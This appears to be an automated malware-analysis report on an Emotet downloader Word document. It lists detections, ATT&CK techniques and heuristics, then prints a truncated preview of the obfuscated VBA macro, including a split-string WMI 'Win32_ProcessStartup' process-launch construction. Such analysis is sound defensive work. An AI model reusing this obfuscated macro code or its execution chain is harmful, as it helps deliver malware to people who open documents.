Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6870539-0', strongly suggesting the Emotet family. High-severity heuristics indicate the presence of VBA macros, specifically an AutoOpen macro that uses GetObject, pointing towards an execution chain. The VBA script itself is heavily obfuscated but its structure and the heuristic firings suggest it's designed to download and execute a secondary payload, a common Emotet behavior.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-6870539-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6870539-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 40363 bytes |

SHA-256 (macros.bas): f650cf59b1e2de0dfaa4d0c23616256966ce8abd8aef7fe5ffd83fcef5e54c4e
Preview script: first 1,000 lines of the extracted script (truncated below)

```vba
Attribute VB_Name = "c6_9_2"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "R930_4_"
Function m6251834()
Select Case D4_1_29
Case 688262218
c_7_23 = V_311__7
J763568 = R6_27_20
i122_08 = Sgn(360664879 * Round(31576510))
Case 173336356
P_180_ = ChrB(391123801)
b5636_ = Sgn(736885294)
z18_082 = c__70031
End Select
Select Case c_404255
Case 581656549
M64_37 = i708_0
O460___5 = G_0___62
o_10___4 = Sgn(891266334 * Round(203280854))
Case 311358710
Q124_4 = ChrB(268935819)
Z7556_7_ = Sgn(149067780)
U_93__42 = z8205__
End Select
Select Case i89_671
Case 507394348
u_122_ = R15_____
i6357_43 = I60_9_8
c_96_2 = Sgn(485773637 * Round(268976496))
Case 905746370
m033_0_ = ChrB(571770796)
r_8_8_ = Sgn(419551533)
D7960_ = X3_866__
End Select
Select Case o49__0__
Case 599578729
C_36_86 = D09__23
a_98_37 = s6__1_24
C_0____ = Sgn(145854524 * Round(645023246))
Case 662752568
W182_28 = ChrB(824980585)
P088_390 = Sgn(833189019)
q06_2__3 = B_4__7_3
End Select
Select Case i3_52519
Case 487753757
J262043 = c_3_39
l44__0_4 = w846877
j13924 = Sgn(124466026 * Round(182544359))
Case 700364713
G8_3_5 = ChrB(342043838)
Z8_5049 = Sgn(18359304)
o566__9 = j07353
End Select
Select Case L_98__28
Case 221205271
j__149_ = m_5736_6
m479__22 = K_85_62_
i0_02493 = Sgn(375276563 * Round(512879290))
Case 106026920
S_737_2 = ChrB(96172308)
V8_710 = Sgn(774616089)
q4526_7_ = k3_89386
End Select
Select Case s721_3_
Case 972103209
i34_75 = s48828_5
r_3___0 = l9_8843_
Y_89_4 = Sgn(481721139 * Round(935199379))
Case 395876507
S8_939_ = ChrB(790277822)
N38373 = Sgn(690604455)
u_64_8 = V9614_2
End Select
End Function
Function S66_68_(f52_310, W_27725_)
On Error Resume Next
Select Case U1_1__61
Case 323104154
p_12_3__ = q2519_8
Y34870_9 = a_650062
R84769_ = Sgn(585655317 * Round(2646355))
Case 117269573
M96_9697 = ChrB(842849670)
D507_064 = Sgn(779710282)
V___3_ = b_108_
End Select
Select Case w0__2_
Case 83214086
f279_562 = v0____2_
i482_315 = A1131_
Z95459 = Sgn(225181066 * Round(579934180))
Case 104051638
M12_2260 = ChrB(283908048)
P17___0_ = Sgn(674758877)
z40_7_ = N22872_3
End Select
Select Case v_21___
Case 857538370
i45376_ = F8_3_7
j___7__ = U6___5_
f_40_1 = Sgn(796027065 * Round(153866615))
Case 18688584
n30441 = ChrB(24440903)
M573__8 = Sgn(88832167)
J_4___6 = o35___
End Select
k3__72_0 = (z8___0 + "winm" + "gmts:Win32") + (m23_0_ + "_ProcessStartup" + z36__4_)
Select Case I3_309
Case 991713277
w885810 = n53287
K3843___ = t__18__
Q__767 = Sgn(34261029 * Round(95784372))
Case 629873756
h72_6_ = ChrB(811919155)
i0889_04 = Sgn(699820432)
M24__6 = p3_40_
End Select
Select Case z_0842_
Case 322414876
L6_06__4 = Q_14464
H9616468 = R___50
m1___3 = Sgn(635888042 * Round(128357648))
... (truncated)
```